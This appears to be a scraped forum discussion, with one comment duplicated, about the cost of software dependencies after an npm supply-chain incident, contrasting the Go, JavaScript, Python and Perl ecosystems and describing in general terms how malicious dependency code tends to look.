"If you have tons of depedencies then it's not feasible to check every diff."
Part of bringing in a dependency is bringing in the responsibility for verifying it's not obviously being used badly. One of the things I've come to respect the Go community for is its belief that dependencies are more expensive that most developers currently realize, and so generally library authors try to minimize dependencies. Our build systems make it very easy to technically bring in lots of dependencies, but are not currently assisting us in maintaining them properly very often. (In their defense, it is not entirely clear to me what the latter would even mean at an implementation level. I have some vague ideas, but nothing solid enough to complain about not having when even I don't know what it is I want exactly.)
I've definitely pulled some things in that pulled in ~10 other dependencies, but after inspection, they were generally all very reasonable. I've never pulled a Go library and gotten 250 dependencies pulled in transitively, which seems to be perfectly normal in the JS world.
I won't deny I haven't auditing every single line of every single dependency... but I do look at every incoming patch when I update. It's part of the job. (And I have actually looked at the innards of a fairly significant number of the dependencies.) It's actually not that hard... malicious code tends to stick out like a sore thumb. Not always [1], but the vast majority of the time. In static languages, you see things like network activity happening where it shouldn't, and in things like JS, the obfuscation attempts themselves have a pretty obvious pattern to them (big honking random-looking string, fed to a variety of strange decoding functions and ultimately evaluated, very stereotypical look to it).
And let me underline the point that there's a lot of tooling right now that actively assists you into getting into trouble on this front, but doesn't do much to help you hold the line. I'm not blaming end developers 100%. Communities have some work here to be done too.
I'm not convinced that this incident argues in favor of Go's "a little copying is better than a little dependency", which I continue to strongly disagree with. Rather, it indicates that you shouldn't blindly upgrade. Dependency pinning exists for a reason, and copying code introduces more problems than it solves.
I don't think you have to get all the way to the Go community's opinions to be in a reasonable place; I think the JS community is at a far extrema in the other direction and suffer this problem particularly badly, but that doesn't mean the other extreme is the ideal point. I don't personally know of any other community where it's considered perfectly hunky-dory to have one-line libraries... which then depend on other one-line libraries. My Python experiences are closer to the Go side than the JS side... yeah, I expect Python to pull in a few more things than maybe Go would, but still be sane. The node modules directories I've seen have been insane... and the ones I've seen are for tiny little projects, relatively speaking. There isn't even an excuse that we need LDAP and a DB interface and some complicated ML library or something... it was just a REST shell and not even all that large of one. This one tiny project yanked in more dependencies than the sum total of several Perl projects I'm in charge of that ran over the course of over a decade, and Perl's a bit to the "dependency-happy" side itself!
I suggest a different narrative. That node.js achieved the decades-old aspiration of fine-grain software reuse... and has some technical debt around building the social and technical infrastructure to support that.
Fine-grain sharing gracefully at scale, is a hard technical and social challenge. A harder challenge than CPAN faced, and addressed so imperfectly. But whereas the Perl community was forced to struggle over years to build it's own infrastructure - purpose-built infrastructure - node.js was able to take a different path. A story goes, that node.js almost didn't get an npm, but for someone's suggestion "don't be python" (which struggled for years). It built a minimum-viable database, and leaned heavily on github. The community didn't develop the same focus on, and control over, its own communal infrastructure tooling. And now faces the completely unsurprising costs of that tradeoff. Arguably behind time, due to community structure and governance challenges.
Let's imagine you were creating a powerful new language. Having paragraph- and line-granularity community sharing could well be a worthwhile goal. Features like multiple dispatch and dependent types and DSLs and collaborative compilation... could permit far finer-grain sharing than even the node.js ecosystem manages. But you would never think npm plus github sufficient infrastructure to support it. Except perhaps in some early community-bootstrap phase.
Unfortunately, one of the things that makes JS dev pull in so many deps is that it lacks a decent standard library. Meanwhile, the Go standard library is amazing!
Part of bringing in a dependency is bringing in the responsibility for verifying it's not obviously being used badly. One of the things I've come to respect the Go community for is its belief that dependencies are more expensive that most developers currently realize, and so generally library authors try to minimize dependencies. Our build systems make it very easy to technically bring in lots of dependencies, but are not currently assisting us in maintaining them properly very often. (In their defense, it is not entirely clear to me what the latter would even mean at an implementation level. I have some vague ideas, but nothing solid enough to complain about not having when even I don't know what it is I want exactly.)
I've definitely pulled some things in that pulled in ~10 other dependencies, but after inspection, they were generally all very reasonable. I've never pulled a Go library and gotten 250 dependencies pulled in transitively, which seems to be perfectly normal in the JS world.
I won't deny I haven't auditing every single line of every single dependency... but I do look at every incoming patch when I update. It's part of the job. (And I have actually looked at the innards of a fairly significant number of the dependencies.) It's actually not that hard... malicious code tends to stick out like a sore thumb. Not always [1], but the vast majority of the time. In static languages, you see things like network activity happening where it shouldn't, and in things like JS, the obfuscation attempts themselves have a pretty obvious pattern to them (big honking random-looking string, fed to a variety of strange decoding functions and ultimately evaluated, very stereotypical look to it).
And let me underline the point that there's a lot of tooling right now that actively assists you into getting into trouble on this front, but doesn't do much to help you hold the line. I'm not blaming end developers 100%. Communities have some work here to be done too.
[1]: http://underhanded-c.org/